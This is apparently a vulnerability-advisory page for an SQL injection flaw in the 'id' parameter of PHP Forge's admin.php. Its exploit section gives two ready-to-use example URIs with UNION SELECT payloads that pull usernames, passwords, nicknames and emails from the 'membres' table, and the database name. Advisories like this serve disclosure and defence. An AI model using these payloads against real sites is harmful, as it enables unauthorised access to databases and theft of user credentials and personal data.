• info
• discussion
• exploit
• solution
• references

PHP Forge 'id' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/admin.php?module=news&p=modifier&id=-1 union select 0,identifiant,mdp,pseudo,email,description,6,7 from membres--
http://www.example.com/admin.php?module=news&p=modifier&id=-1 union select 0,1,database(),3,4,5,6,7 from membres--